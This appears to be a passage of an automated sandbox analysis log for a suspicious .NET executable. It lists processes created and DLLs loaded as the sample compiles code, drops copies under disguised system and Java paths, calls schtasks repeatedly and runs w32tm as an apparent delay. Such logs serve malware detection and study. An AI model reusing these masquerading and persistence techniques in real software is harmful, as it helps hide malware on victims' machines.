                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: sspicli.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: mscoree.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: apphelp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: version.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: wldp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: profapi.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: sspicli.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: mscoree.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: version.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: ucrtbase_clr0400.dll
